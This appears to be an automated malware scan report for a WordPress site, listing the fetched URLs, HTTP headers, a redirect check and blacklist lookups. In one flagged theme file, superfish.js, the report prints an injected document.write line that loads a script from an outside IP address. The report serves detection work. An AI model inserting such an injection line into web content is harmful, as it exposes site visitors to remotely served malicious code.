Scanned pages/files
Request | Server response | Status |
http://adpl.org.hk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 22:58:28 GMT Location: http://www.adpl.org.hk/ Server: Apache/2.2.22 (@RELEASE@) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498709%7Ccb5cd9910608f2ff781df74341f3a4d0; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/; httponly X-Pingback: http://www.adpl.org.hk/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.adpl.org.hk/ | 200 OK Content-Length: 41545 Content-Type: text/html | clean |
http://www.adpl.org.hk/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-content/themes/UpStream/lib/js/superfish.js?ver=3.5.1 | 200 OK Content-Length: 3926 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; cle var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery);
document.write("<script language=javascript src=http://210.56.48.167/cpt/all.js></script>")
Antivirus reports:
http://www.adpl.org.hk/wp-content/themes/UpStream/includes/featuredposts/scripts/jquery.cycle.all.js | 200 OK Content-Length: 51328 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-content/plugins/youtube-sidebar-widget/script.js | 200 OK Content-Length: 1560 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-includes/js/hoverIntent.min.js?ver=r6 | 200 OK Content-Length: 996 Content-Type: text/javascript | clean |
http://stats.wordpress.com/e-201452.js | 200 OK Content-Length: 2332 Content-Type: application/x-javascript | clean |
http://adpl.org.hk/index.php?page_id=50 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 22:58:36 GMT Location: http://www.adpl.org.hk/?page_id=50 Server: Apache/2.2.22 (@RELEASE@) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498716%7C0dc9d5b2c44e10595b4ce81ad1c9cb10; expires=Mon, 05-Jan-2015 22:58:36 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498716%7C0dc9d5b2c44e10595b4ce81ad1c9cb10; expires=Mon, 05-Jan-2015 22:58:36 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498716%7Ca637a523dae879ef02bfdd4313c99fc5; expires=Mon, 05-Jan-2015 22:58:36 GMT; path=/; httponly X-Pingback: http://www.adpl.org.hk/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.adpl.org.hk/?page_id=50 | 200 OK Content-Length: 30623 Content-Type: text/html | clean |
http://www.adpl.org.hk/wp-content/plugins/ckeditor-for-wordpress/ckeditor/ckeditor.js?t=CBDD&ver=3.5.1 | 200 OK Content-Length: 300914 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-content/plugins/ckeditor-for-wordpress/includes/ckeditor.utils.js?ver=3.5.1 | 200 OK Content-Length: 16591 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-content/plugins/ckeditor-for-wordpress/includes/ckeditor.comment-reply.js?ver=20100901 | 200 OK Content-Length: 1354 Content-Type: text/javascript | clean |
http://adpl.org.hk/index.php?cat=1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 22:58:43 GMT Location: http://www.adpl.org.hk/?cat=1 Server: Apache/2.2.22 (@RELEASE@) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498723%7C3394fdf720a18186bf637d5c0643facc; expires=Mon, 05-Jan-2015 22:58:43 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498723%7C3394fdf720a18186bf637d5c0643facc; expires=Mon, 05-Jan-2015 22:58:43 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498723%7Cf7e170a9b8fcaf7cdb4d9af4c3a436c1; expires=Mon, 05-Jan-2015 22:58:43 GMT; path=/; httponly X-Pingback: http://www.adpl.org.hk/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.adpl.org.hk/?cat=1 | 200 OK Content-Length: 39852 Content-Type: text/html | clean |
http://www.adpl.org.hk/?page_id=9 | 200 OK Content-Length: 30094 Content-Type: text/html | clean |
http://www.adpl.org.hk/?page_id=12 | 200 OK Content-Length: 27156 Content-Type: text/html | clean |
http://www.adpl.org.hk/index.php?page_id=50 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 22:58:48 GMT Location: http://www.adpl.org.hk/?page_id=50 Server: Apache/2.2.22 (@RELEASE@) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498728%7C4083581a4ae29b0bad026d12cb207ec2; expires=Mon, 05-Jan-2015 22:58:48 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498728%7C4083581a4ae29b0bad026d12cb207ec2; expires=Mon, 05-Jan-2015 22:58:48 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498728%7C4c08345ca8a98c3234dce7526f40ba72; expires=Mon, 05-Jan-2015 22:58:48 GMT; path=/; httponly X-Pingback: http://www.adpl.org.hk/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.adpl.org.hk/test404page.js | 404 Not Found Content-Length: 296 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: adpl.org.hk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 22:58:28 GMT
Location: http://www.adpl.org.hk/
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498709%7Ccb5cd9910608f2ff781df74341f3a4d0; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/; httponly
X-Pingback: http://www.adpl.org.hk/xmlrpc.php
X-Powered-By: PHP/5.3.3
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: adpl.org.hk
Referer: http://www.google.com/search?q=adpl.org.hk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=adpl.org.hk
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://adpl.org.hk/
Result: adpl.org.hk is not infected or malware details are not published yet.